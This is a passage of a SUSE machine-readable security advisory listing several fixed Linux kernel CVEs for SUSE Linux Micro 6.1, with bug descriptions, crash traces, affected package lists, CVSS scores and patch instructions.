"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntracing: Fix memory leak of iter-\u003etemp when reading trace_pipe\n\nkmemleak reports:\n unreferenced object 0xffff88814d14e200 (size 256):\n comm \"cat\", pid 336, jiffies 4294871818 (age 779.490s)\n hex dump (first 32 bytes):\n 04 00 01 03 00 00 00 00 08 00 00 00 00 00 00 00 ................\n 0c d8 c8 9b ff ff ff ff 04 5a ca 9b ff ff ff ff .........Z......\n backtrace:\n [\u003cffffffff9bdff18f\u003e] __kmalloc+0x4f/0x140\n [\u003cffffffff9bc9238b\u003e] trace_find_next_entry+0xbb/0x1d0\n [\u003cffffffff9bc9caef\u003e] trace_print_lat_context+0xaf/0x4e0\n [\u003cffffffff9bc94490\u003e] print_trace_line+0x3e0/0x950\n [\u003cffffffff9bc95499\u003e] tracing_read_pipe+0x2d9/0x5a0\n [\u003cffffffff9bf03a43\u003e] vfs_read+0x143/0x520\n [\u003cffffffff9bf04c2d\u003e] ksys_read+0xbd/0x160\n [\u003cffffffff9d0f0edf\u003e] do_syscall_64+0x3f/0x90\n [\u003cffffffff9d2000aa\u003e] entry_SYSCALL_64_after_hwframe+0x6e/0xd8\n\nwhen reading file \u0027trace_pipe\u0027, \u0027iter-\u003etemp\u0027 is allocated or relocated\nin trace_find_next_entry() but not freed before \u0027trace_pipe\u0027 is closed.\n\nTo fix it, free \u0027iter-\u003etemp\u0027 in tracing_release_pipe().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54171",
"url": "https://www.suse.com/security/cve/CVE-2023-54171"
},
{
"category": "external",
"summary": "SUSE Bug 1256034 for CVE-2023-54171",
"url": "https://bugzilla.suse.com/1256034"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54171"
},
{
"cve": "CVE-2023-54172",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54172"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86/hyperv: Disable IBT when hypercall page lacks ENDBR instruction\n\nOn hardware that supports Indirect Branch Tracking (IBT), Hyper-V VMs\nwith ConfigVersion 9.3 or later support IBT in the guest. However,\ncurrent versions of Hyper-V have a bug in that there\u0027s not an ENDBR64\ninstruction at the beginning of the hypercall page. Since hypercalls are\nmade with an indirect call to the hypercall page, all hypercall attempts\nfail with an exception and Linux panics.\n\nA Hyper-V fix is in progress to add ENDBR64. But guard against the Linux\npanic by clearing X86_FEATURE_IBT if the hypercall page doesn\u0027t start\nwith ENDBR. The VM will boot and run without IBT.\n\nIf future Linux 32-bit kernels were to support IBT, additional hypercall\npage hackery would be needed to make IBT work for such kernels in a\nHyper-V VM.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54172",
"url": "https://www.suse.com/security/cve/CVE-2023-54172"
},
{
"category": "external",
"summary": "SUSE Bug 1256033 for CVE-2023-54172",
"url": "https://bugzilla.suse.com/1256033"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54172"
},
{
"cve": "CVE-2023-54173",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54173"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Disable preemption in bpf_event_output\n\nWe received report [1] of kernel crash, which is caused by\nusing nesting protection without disabled preemption.\n\nThe bpf_event_output can be called by programs executed by\nbpf_prog_run_array_cg function that disabled migration but\nkeeps preemption enabled.\n\nThis can cause task to be preempted by another one inside the\nnesting protection and lead eventually to two tasks using same\nperf_sample_data buffer and cause crashes like:\n\n BUG: kernel NULL pointer dereference, address: 0000000000000001\n #PF: supervisor instruction fetch in kernel mode\n #PF: error_code(0x0010) - not-present page\n ...\n ? perf_output_sample+0x12a/0x9a0\n ? finish_task_switch.isra.0+0x81/0x280\n ? perf_event_output+0x66/0xa0\n ? bpf_event_output+0x13a/0x190\n ? bpf_event_output_data+0x22/0x40\n ? bpf_prog_dfc84bbde731b257_cil_sock4_connect+0x40a/0xacb\n ? xa_load+0x87/0xe0\n ? __cgroup_bpf_run_filter_sock_addr+0xc1/0x1a0\n ? release_sock+0x3e/0x90\n ? sk_setsockopt+0x1a1/0x12f0\n ? udp_pre_connect+0x36/0x50\n ? inet_dgram_connect+0x93/0xa0\n ? __sys_connect+0xb4/0xe0\n ? udp_setsockopt+0x27/0x40\n ? __pfx_udp_push_pending_frames+0x10/0x10\n ? __sys_setsockopt+0xdf/0x1a0\n ? __x64_sys_connect+0xf/0x20\n ? do_syscall_64+0x3a/0x90\n ? entry_SYSCALL_64_after_hwframe+0x72/0xdc\n\nFixing this by disabling preemption in bpf_event_output.\n\n[1] https://github.com/cilium/cilium/issues/26756",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54173",
"url": "https://www.suse.com/security/cve/CVE-2023-54173"
},
{
"category": "external",
"summary": "SUSE Bug 1255996 for CVE-2023-54173",
"url": "https://bugzilla.suse.com/1255996"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54173"
},
{
"cve": "CVE-2023-54177",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54177"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nquota: fix warning in dqgrab()\n\nThere\u0027s issue as follows when do fault injection:\nWARNING: CPU: 1 PID: 14870 at include/linux/quotaops.h:51 dquot_disable+0x13b7/0x18c0\nModules linked in:\nCPU: 1 PID: 14870 Comm: fsconfig Not tainted 6.3.0-next-20230505-00006-g5107a9c821af-dirty #541\nRIP: 0010:dquot_disable+0x13b7/0x18c0\nRSP: 0018:ffffc9000acc79e0 EFLAGS: 00010246\nRAX: 0000000000000000 RBX: 0000000000000000 RCX: ffff88825e41b980\nRDX: 0000000000000000 RSI: ffff88825e41b980 RDI: 0000000000000002\nRBP: ffff888179f68000 R08: ffffffff82087ca7 R09: 0000000000000000\nR10: 0000000000000001 R11: ffffed102f3ed026 R12: ffff888179f68130\nR13: ffff888179f68110 R14: dffffc0000000000 R15: ffff888179f68118\nFS: 00007f450a073740(0000) GS:ffff88882fc00000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00007ffe96f2efd8 CR3: 000000025c8ad000 CR4: 00000000000006e0\nDR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\nDR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\nCall Trace:\n \u003cTASK\u003e\n dquot_load_quota_sb+0xd53/0x1060\n dquot_resume+0x172/0x230\n ext4_reconfigure+0x1dc6/0x27b0\n reconfigure_super+0x515/0xa90\n __x64_sys_fsconfig+0xb19/0xd20\n do_syscall_64+0x39/0xb0\n entry_SYSCALL_64_after_hwframe+0x63/0xcd\n\nAbove issue may happens as follows:\nProcessA ProcessB ProcessC\nsys_fsconfig\n vfs_fsconfig_locked\n reconfigure_super\n ext4_remount\n dquot_suspend -\u003e suspend all type quota\n\n sys_fsconfig\n vfs_fsconfig_locked\n reconfigure_super\n ext4_remount\n dquot_resume\n ret = dquot_load_quota_sb\n add_dquot_ref\n do_open -\u003e open file O_RDWR\n vfs_open\n do_dentry_open\n get_write_access\n atomic_inc_unless_negative(\u0026inode-\u003ei_writecount)\n ext4_file_open\n dquot_file_open\n dquot_initialize\n __dquot_initialize\n dqget\n\t\t\t\t\t\t atomic_inc(\u0026dquot-\u003edq_count);\n\n __dquot_initialize\n __dquot_initialize\n dqget\n if (!test_bit(DQ_ACTIVE_B, \u0026dquot-\u003edq_flags))\n ext4_acquire_dquot\n\t\t\t -\u003e Return error DQ_ACTIVE_B flag isn\u0027t set\n dquot_disable\n\t\t\t invalidate_dquots\n\t\t\t if (atomic_read(\u0026dquot-\u003edq_count))\n\t dqgrab\n\t\t\t WARN_ON_ONCE(!test_bit(DQ_ACTIVE_B, \u0026dquot-\u003edq_flags))\n\t -\u003e Trigger warning\n\nIn the above scenario, \u0027dquot-\u003edq_flags\u0027 has no DQ_ACTIVE_B is normal when\ndqgrab().\nTo solve above issue just replace the dqgrab() use in invalidate_dquots() with\natomic_inc(\u0026dquot-\u003edq_count).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54177",
"url": "https://www.suse.com/security/cve/CVE-2023-54177"
},
{
"category": "external",
"summary": "SUSE Bug 1255993 for CVE-2023-54177",
"url": "https://bugzilla.suse.com/1255993"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "low"
}
],
"title": "CVE-2023-54177"
},
{
"cve": "CVE-2023-54178",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54178"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nof: unittest: fix null pointer dereferencing in of_unittest_find_node_by_name()\n\nwhen kmalloc() fail to allocate memory in kasprintf(), name\nor full_name will be NULL, strcmp() will cause\nnull pointer dereference.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54178",
"url": "https://www.suse.com/security/cve/CVE-2023-54178"
},
{
"category": "external",
"summary": "SUSE Bug 1255992 for CVE-2023-54178",
"url": "https://bugzilla.suse.com/1255992"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
